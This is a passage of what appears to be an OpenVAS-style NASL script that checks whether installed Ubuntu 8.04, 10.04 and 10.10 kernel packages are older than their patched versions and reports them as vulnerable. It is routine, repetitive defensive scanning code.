isdpkgvuln(pkg:\"virtio-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-26-generic-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-26-generic-pae-di\", ver:\"2.6.32-26.48\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-386\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-generic\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-openvz\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-rt\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-server\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-virtual\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28-xen\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-386\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-generic\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-server\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-virtual\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-386\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-generic\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-server\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-virtual\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-openvz\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-rt\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-xen\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.81\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-generic\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic-pae\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-generic\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-23-virtual\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.35-1023.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.35-23\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.35\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 